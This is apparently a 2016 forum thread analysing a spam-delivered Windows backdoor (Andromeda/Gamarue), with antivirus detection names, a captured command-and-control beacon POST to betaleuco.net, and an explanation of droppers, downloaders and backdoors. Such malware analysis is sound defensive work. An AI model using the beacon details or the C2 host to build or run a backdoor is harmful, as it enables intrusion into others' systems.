Just got a new viral-spam payload (Androm / Outbreak / Sality)

Do you have a question? Post it now! No Registration Necessary.  Now with pictures!

Threaded View
This came in almost 3 hours ago:

https://www.virustotal.com/en/file/89e7c151213131873ecf2cd16ba6842e21c391201f9494c8f574d56b75172963/analysis/1460034005/

VT scan result 12/57  

AegisLab      Troj.W32.Gen.lJ4P
Arcabit       Trojan.A
Avast         Win32:Trojan-gen
Baidu         Win32.Trojan.WisdomEyes.151026.9950.9957
Ikarus        Win32.Outbreak
Kaspersky     Backdoor.Win32.Androm.jkpi
Malwarebytes  Backdoor.Bot
McAfee-GW     BehavesLike.Win32.Sality.ch
Qihoo-360     HEUR/QVM10.1.Malware.Gen
Rising        PE:Malware.Obscure/Heur!1.9E03 [F]
Sophos        Mal/Generic-S
Tencent       Win32.Trojan.Inject.Auto

Uploaded to uploadmalware.

I'll mess around with it a little and see what else I can find out.

Spam originated from 193.16.229.57 (poland).

Re: Just got a new viral-spam payload (Androm / Outbreak / Sality)

On 4/7/2016 9:22 AM, Virus Guy wrote:
Quoted text here. Click to load it

There is a big difference between Sality and an Andromeda backdoor bot.  
  If it was truly Sality, all anti virus vendors would have that detection.

Most likely, it is an Andromeda/Gamarue trojan.


--  
Dave
Multi-AV Scanning Tool - http://multi-av.thespykiller.co.uk
http://www.pctipp.ch/downloads/dl/35905.asp

Re: Just got a new viral-spam payload (Androm / Outbreak / Sality)

"David H. Lipman" wrote:
  
Quoted text here. Click to load it

I did upload it to uploadmalware - so you should have access to it.

malwr.com analysis shows http traffic, but they seem to be posts, not
gets.  So it wasn't clear to me if there were any visible or operable
payload URL's to be had.

Re: Just got a new viral-spam payload (Androm / Outbreak / Sality)

On 4/9/2016 1:23 PM, Virus Guy wrote:
Quoted text here. Click to load it

As a Backdoor, it has to Beacon the compromised system and/or Phone Home.

POST /allow.php HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1;  
Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR  
3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Length: 42
Host: betaleuco.net





--  
Dave
Multi-AV Scanning Tool - http://multi-av.thespykiller.co.uk
http://www.pctipp.ch/downloads/dl/35905.asp

Re: Just got a new viral-spam payload (Androm / Outbreak / Sality)

"David H. Lipman" wrote:
  
Quoted text here. Click to load it

Wouldn't the act of downloading a payload package be a beacon or signal
in and of itself?

What is being "beacon'd" or signaled by the following that couldn't be
done by Getting what presumably it will end up getting anyways in the
near future?
  
Quoted text here. Click to load it

?

Is there a difference between a backdoor and a dropper?

Am I thinking that these initial infectors are usually droppers - in
that the first (and perhaps only) thing they do is obtain and launch at
least one additional code file from an external server?  

Whereas a backdoor has enough functionality to be persistent on the
infected system and accept incoming connections to carry out future
instructions?

If the latter, how does the backdoor insure that it is reachable through
the gateway or nat-router to which the host is presumably connected to
the internet?  (presumably it can easily defeat any firewall running on
the host)

Re: Just got a new viral-spam payload (Androm / Outbreak / Sality)

On 4/10/2016 10:00 AM, Virus Guy wrote:
Quoted text here. Click to load it


Dropper just refers to an initial action.  A trojan can be a dropper or  
a downloader.  A dropper means that a trojan is encapsulated in another  
file.  It can be a MS Office Document or it can be an EXE like a SFX.  
It drops the payload.  The Dropper is the delivery mechanism for the  
payload.

A downloader is simply a trojan that gets the payload from the Internet.  
  Either the file is in raw PE format or is is being obfuscated with a  
different file extension such as PDF or JPG.  Or it could be Zlib  
encoded or in Base64 format or XOR'd with some value or even encrypted.  
  But the results are the same, the downloader trojan obtains the  
payload from the Internet.  That payload may be hard-wired in the  
downloader or it may obtain the download site from a C2 server and then  
download the payload.

The Backdoor is the end result.  The payload.

The malicious actor does not know what system(s) are now compromised and  
can be used to their benefit.  Thus the now compromised system will  
beacon and/or Phone Home telling the malicious actor this system is now  
available.

The backdoor invites the malicious actor and thus grants access to the  
compromised system so it can communicate through a NAT Router.  It is  
the job of the Firewall constructs of NAT or using a full Firewall  
implementation within the NAT Router that is the Doorman of the Router  
determining if even invited systems can get through the NAT Router.  So  
if the Backdoor opens TCP port 23500 it would be up to the Firewall  
constructs of NAT or using a full Firewall implementation that will  
block the malicious actor from ingress through TCP port 23500.




--  
Dave
Multi-AV Scanning Tool - http://multi-av.thespykiller.co.uk
http://www.pctipp.ch/downloads/dl/35905.asp

Site Timeline